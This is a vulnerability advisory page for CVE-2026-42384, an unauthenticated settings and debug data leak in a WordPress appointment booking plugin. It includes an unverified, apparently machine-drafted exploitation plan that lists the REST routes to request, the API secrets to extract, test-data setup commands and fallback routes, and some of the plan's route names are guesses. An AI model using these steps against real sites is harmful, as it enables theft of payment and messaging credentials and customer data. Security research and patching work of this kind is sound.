CVE-2026-42384

Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin < 1.6.11.2 - Unauthenticated Sensitive Information Exposure

mediumExposure of Sensitive Information to an Unauthorized Actor
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
1.6.11.2
Patched in
4d
Time to patch

Description

The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to 1.6.11.2 (exclusive). This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Low
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<1.6.11.2
PublishedApril 27, 2026
Last updatedApril 30, 2026

What Changed in the Fix

Changes introduced in v1.6.11.2

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-42384 ## 1. Vulnerability Summary The **Simply Schedule Appointments (SSA)** plugin for WordPress is vulnerable to **Unauthenticated Sensitive Information Exposure** in versions up to 1.6.11.2. The vulnerability exists because several REST API endpoints, speci…

Show full research plan

Exploitation Research Plan: CVE-2026-42384

1. Vulnerability Summary

The Simply Schedule Appointments (SSA) plugin for WordPress is vulnerable to Unauthenticated Sensitive Information Exposure in versions up to 1.6.11.2. The vulnerability exists because several REST API endpoints, specifically those handling settings and debug information, were registered without proper permission_callback authorization checks. This allow an unauthenticated attacker to query these endpoints and retrieve sensitive configuration data, including third-party API keys (Mailchimp, Google, Twilio, Stripe), site configurations, and potentially appointment or customer details.

2. Attack Vector Analysis

  • Endpoint: WordPress REST API Namespace ssa/v1 (inferred).
  • Target Routes:
    • /wp-json/ssa/v1/settings (Exposure of plugin settings)
    • /wp-json/ssa/v1/debug (Exposure of system debug information)
  • HTTP Method: GET
  • Authentication: None (Unauthenticated).
  • Preconditions: The plugin must be active. Sensitive data (like API keys) is more likely to be found if the plugin has been configured by an administrator.

3. Code Flow

  1. During the rest_api_init hook (likely inside the SSA_Settings_Api class or Simply_Schedule_Appointments initialization), routes are registered using register_rest_route().
  2. In vulnerable versions, the permission_callback for the settings and debug routes is either missing, returns __return_true, or lacks a check for manage_options capabilities.
  3. An unauthenticated request to /wp-json/ssa/v1/settings triggers the handler (e.g., get_settings in SSA_Settings_Api).
  4. The handler fetches all options from the wp_options table (e.g., the ssa_settings option) and returns them as a JSON response without verifying the requester's identity.

4. Nonce Acquisition Strategy

REST API endpoints in WordPress typically require a nonce (X-WP-Nonce) only when using cookie-based authentication for state-changing requests (POST, DELETE) or when the route explicitly mandates it. For unauthenticated information exposure via GET requests, the vulnerability implies the endpoint is accessible without a nonce.

If the endpoint does check for a nonce, SSA often localizes it in its booking widgets.

  • Strategy:
    1. Create a page with the SSA booking shortcode: [ssa_booking].
    2. Navigate to the page.
    3. Extract the nonce from the localized JS object using browser_eval.
  • Variable Name: window.ssa_localized?.ssa_rest_nonce (inferred based on standard SSA JS architecture).
  • Note: The changelog states "Add Authorization to Settings REST API Endpoint", which strongly suggests the fix was adding a permission_callback check rather than a nonce check.

5. Exploitation Strategy

The goal is to retrieve the plugin's configuration settings which may contain API keys.

  1. Request Settings: Perform an unauthenticated GET request to the settings endpoint.

    • URL: http://localhost:8080/wp-json/ssa/v1/settings
    • Method: GET
    • Header: Accept: application/json
  2. Request Debug Info: Perform an unauthenticated GET request to the debug endpoint.

    • URL: http://localhost:8080/wp-json/ssa/v1/debug
    • Method: GET
  3. Analyze Response: Look for keys such as:

    • mailchimp_api_key
    • google_calendar_client_id / google_calendar_client_secret
    • stripe_publishable_key / stripe_secret_key
    • twilio_account_sid / twilio_auth_token

6. Test Data Setup

To demonstrate a high-impact exposure, we need to populate the settings with dummy "sensitive" data.

# Set a dummy Mailchimp API key in the SSA settings
# SSA settings are usually stored in a serialized array in the 'ssa_settings' option.
wp eval '
$settings = get_option("ssa_settings", []);
$settings["mailchimp_api_key"] = "AK_SECRET_VULN_TEST_12345";
$settings["twilio_auth_token"] = "TOKEN_VULN_TEST_67890";
update_option("ssa_settings", $settings);
'

# Create a dummy appointment to see if appointment-related endpoints are also exposed
wp eval '
global $wpdb;
$wpdb->insert($wpdb->prefix . "ssa_appointments", [
    "customer_information" => serialize(["email" => "victim@example.com", "name" => "Victim User"]),
    "status" => "booked",
    "appointment_type_id" => 1
]);
'

7. Expected Results

  • Settings Endpoint: A successful response (200 OK) containing a JSON object. The object should include the keys mailchimp_api_key and twilio_auth_token with the values set in the test data.
  • Debug Endpoint: A JSON response containing system information, server paths, and potentially database version details.

8. Verification Steps

  1. Verify Response Content: Use the PoC agent to check if the string AK_SECRET_VULN_TEST_12345 is present in the HTTP response body.
  2. Compare with Database: Use WP-CLI to confirm the retrieved value matches the database:
    wp option get ssa_settings --format=json | grep "AK_SECRET_VULN_TEST_12345"
    

9. Alternative Approaches

If the routes /settings or /debug return 404 or 401, try the following variations:

  • Variation 1 (Namespace check): Explore the namespace list to find the correct slug:
    GET http://localhost:8080/wp-json/ and look for ssa/v1 or ssa/v2 in the namespaces array.
  • Variation 2 (Specific setting sub-routes): Some plugins split settings:
    GET http://localhost:8080/wp-json/ssa/v1/settings/mailchimp
    GET http://localhost:8080/wp-json/ssa/v1/settings/google-calendar
  • Variation 3 (Support Status): The main class mentions support_status_api. Try:
    GET http://localhost:8080/wp-json/ssa/v1/support-status

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.